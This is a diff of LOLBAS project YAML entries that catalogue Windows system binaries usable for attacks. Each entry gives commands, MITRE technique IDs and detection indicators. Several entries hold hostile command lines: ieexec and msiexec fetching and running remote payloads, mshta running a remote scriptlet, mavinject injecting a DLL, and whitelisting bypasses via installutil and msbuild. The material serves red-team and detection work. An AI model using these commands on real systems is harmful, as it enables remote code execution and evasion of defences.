Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\system32\forfiles.exe
- C:\Windows\sysWOW64\forfiles.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/vector_sec/status/896049052642533376
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe
- Link: https://twitter.com/vector_sec/status/896049052642533376
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Eric
Handle: '@vector_sec'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

42
yml/OSBinaries/Gpscript.yml
View File

@ -1,22 +1,36 @@
---
Name: Gpscript.exe
Description: Execute
Author: ''
Description: Used by group policy to process scripts
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Gpscript /logon
Description: 'Executes logon scripts configured in Group Policy.'
Description: Executes logon scripts configured in Group Policy.
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Gpscript /startup
Description: 'Executes startup scripts configured in Group Policy.'
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\gpscript.exe
- c:\windows\sysWOW64\gpscript.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe
Code Sample:
- Code:
Detection:
- IOC: Scripts added in local group policy
- IOC: Execution of Gpscript.exe after logon
Resources:
- https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Notes: |
Thanks to Oddvar Moe - @oddvarmoe
Requires administrative rights and modifications to local group policy settings.
- Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

44
yml/OSBinaries/Hh.yml
View File

@ -1,23 +1,35 @@
---
Name: hh.exe
Description: Download, Execute
Author: ''
Name: Hh.exe
Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: HH.exe http://www.google.com
Description: Opens google's web page with HTML Help.
- Command: HH.exe C:\
Description: Opens c:\\ with HTML Help.
- Command: HH.exe c:\windows\system32\calc.exe
Description: 'Opens calc.exe with HTML Help.'
- Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help.
Usecase: Download files from url
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\hh.exe
- c:\windows\sysWOW64\hh.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
Code Sample:
- Code:
Detection:
- IOC: hh.exe should normally not be in use on a normal workstation
Resources:
- https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

35
yml/OSBinaries/Ie4unit.yml
View File

@ -1,20 +1,29 @@
---
Name: Ie4unit.exe
Description: Execute
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: ie4unit.exe -BaseSettings
Description: 'Executes commands from a specially prepared ie4uinit.inf file.'
Description: Executes commands from a specially prepared ie4uinit.inf file.
Usecase: Get code execution by copy files to another location
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'c:\windows\system32\ie4unit.exe '
- 'c:\windows\sysWOW64\ie4unit.exe '
- 'c:\windows\system32\ieuinit.inf '
- 'c:\windows\sysWOW64\ieuinit.inf '
Code Sample: []
Detection: []
- Path: c:\windows\system32\ie4unit.exe
- Path: c:\windows\sysWOW64\ie4unit.exe
- Path: c:\windows\system32\ieuinit.inf
- Path: c:\windows\sysWOW64\ieuinit.inf
Code Sample:
- Code:
Detection:
- IOC: ie4unit.exe loading a inf file from outside %windir%
Resources:
- https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Notes: Thanks to Jimmy - @bohops
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

43
yml/OSBinaries/Ieexec.yml
View File

@ -1,18 +1,35 @@
---
Name: IEExec.exe
Description: Execute
Author: ''
Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: 'Executes bypass.exe from the remote server.'
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\ieexec.exe
- c:\windows\sysWOW64\ieexec.exe
Code Sample: []
Detection: []
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Notes: Thanks to Casey Smith - @subtee
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

36
yml/OSBinaries/Infdefaultinstall.yml
View File

@ -1,20 +1,28 @@
---
Name: InfDefaultInstall.exe
Description: Execute
Author: ''
Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.'
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\Infdefaultinstall.exe
- c:\windows\sysWOW64\Infdefaultinstall.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection:
- IOC:
Resources:
- https://twitter.com/KyleHanslovan/status/911997635455852544
- https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
- https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
Notes: Thanks to Kyle Hanslovan - @kylehanslovan
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
Acknowledgement:
- Person: Kyle Hanslovan
Handle: '@kylehanslovan'
---

55
yml/OSBinaries/Installutil.yml
View File

@ -1,25 +1,42 @@
---
Name: InstallUtil.exe
Description: Execute
Author: ''
Name: Installutil.exe
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: 'Execute the target .NET DLL or EXE.'
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1118
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1118
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code Sample: []
Detection: []
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md
- Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

46
yml/OSBinaries/Makecab.yml
View File

@ -1,22 +1,44 @@
---
Name: Makecab.exe
Description: Package, Add ADS, Download
Author: ''
Description: Binary to package existing files into a cabinet (.cab) file
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Compresses the target file and stores it in the target file.
Usecase: Hide data compressed into an alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\makecab.exe
- c:\windows\sysWOW64\makecab.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe
Code Sample:
- Code:
Detection:
- IOC: Makecab getting files from Internet
- IOC: Makecab storing data into alternate data streams
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

43
yml/OSBinaries/Mavinject.yml
View File

@ -1,22 +1,39 @@
---
Name: Mavinject.exe
Description: Execute, Read ADS
Author: ''
Description: Used by App-v in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110.
Usecase: Inject dll file into running process
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\mavinject.exe
- C:\Windows\SysWOW64\mavinject.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe
Code Sample:
- Code:
Detection:
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
Resources:
- https://twitter.com/gN3mes1s/status/941315826107510784
- https://twitter.com/Hexcorn/status/776122138063409152
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe
- Link: https://twitter.com/gN3mes1s/status/941315826107510784
- Link: https://twitter.com/Hexcorn/status/776122138063409152
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Giuseppe N3mes1s
Handle: '@gN3mes1s'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

55
yml/OSBinaries/Msbuild.yml
View File

@ -1,27 +1,44 @@
---
Name: Msbuild.exe
Description: Execute
Author: ''
Description: Used to compile and execute code
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.
- Command: msbuild.exe Msbuild.csproj
Description: Build and execute a C# project stored in the target CSPROJ file.
Usecase: Compile and run code
Category: AWL bypass
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
Category: Execute
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
Code Sample: []
Detection: []
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
Code Sample:
- Code:
Detection:
- IOC: Msbuild.exe should not normally be executed on workstations
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
- https://github.com/Cn33liz/MSBuildShell
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
- Link: https://github.com/Cn33liz/MSBuildShell
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
- Person: Cn33liz
Handle: '@Cneelis'
---

30
yml/OSBinaries/Msconfig.yml
View File

@ -1,19 +1,27 @@
---
Name: Msconfig.exe
Description: Execute
Author: ''
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Msconfig.exe -5
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
Usecase: Code execution using Msconfig.exe
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\msconfig.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\msconfig.exe
Code Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
Detection:
- IOC: mscfgtlc.xml changes in system32 folder
- IOC: msconfig.exe executing
Resources:
- https://twitter.com/pabraeken/status/991314564896690177
Notes: |
Thanks to Pierre-Alexandre Braeken - @pabraeken
See the Payloads folder for an example mscfgtlc.xml file.
- Link: https://twitter.com/pabraeken/status/991314564896690177
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

48
yml/OSBinaries/Msdt.yml
View File

@ -1,25 +1,37 @@
---
Name: Msdt.exe
Description: Execute
Author: ''
Description: Microsoft diagnostics tool
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Open .diagcab package
Description: ''
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml
/skip TRUE
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'C:\Windows\System32\Msdt.exe '
- 'C:\Windows\SysWOW64\Msdt.exe '
Code Sample: []
Detection: []
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe
Code Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
Detection:
- IOC:
Resources:
- https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- https://twitter.com/harr0ey/status/991338229952598016
Notes: |
Thanks to:
See the Payloads folder for an example PCW8E57.xml file.
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- Link: https://twitter.com/harr0ey/status/991338229952598016
Acknowledgement:
- Person:
Handle:
---

61
yml/OSBinaries/Mshta.yml
View File

@ -1,28 +1,57 @@
---
Name: mshta.exe
Description: Execute, Read ADS
Author: ''
Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: mshta.exe evilfile.hta
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code
Category: Execute
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Description: Executes VBScript supplied as a command line argument.
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Usecase: Execute code
Category: Execute
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\mshta.exe
- C:\Windows\SysWOW64\mshta.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe
Code Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
Detection:
- IOC: mshta.exe executing raw or obfuscated script within the command-line
- IOC: Usage of HTA file
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

51
yml/OSBinaries/Msiexec.yml
View File

@ -1,25 +1,54 @@
---
Name: Msiexec.exe
Description: Execute
Author: ''
Description: Used by Windows to execute msi files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: msiexec /quiet /i cmd.msi
Description: Installs the target .MSI file silently.
Usecase: Execute custom made msi file with attack code
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\msiexec.exe
- c:\windows\sysWOW64\msiexec.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe
Code Sample:
- Code:
Detection:
- IOC: msiexec.exe getting files from Internet
Resources:
- https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
- https://twitter.com/PhilipTsukerman/status/992021361106268161
Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
Acknowledgement:
- Person: netbiosX
Handle: '@netbiosX'
- Person: Philip Tsukerman
Handle: @PhilipTsukerman
---

38
yml/OSBinaries/Odbcconf.yml
View File

@ -1,22 +1,28 @@
---
Name: odbcconf.exe
Description: Execute
Author: ''
Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file.
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'c:\windows\system32\odbcconf.exe '
- c:\windows\sysWOW64\odbcconf.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\odbcconf.exe
- Path: C:\Windows\SysWOW64\odbcconf.exe
Code Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
Detection:
- IOC:
Resources:
- https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
- https://github.com/woanware/application-restriction-bypasses
- https://twitter.com/subTee/status/789459826367606784
Notes: |
Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
See the Playloads folder for an example .RSP file.
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
- Link: https://github.com/woanware/application-restriction-bypasses
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

44
yml/OSBinaries/Pcalua.yml
View File

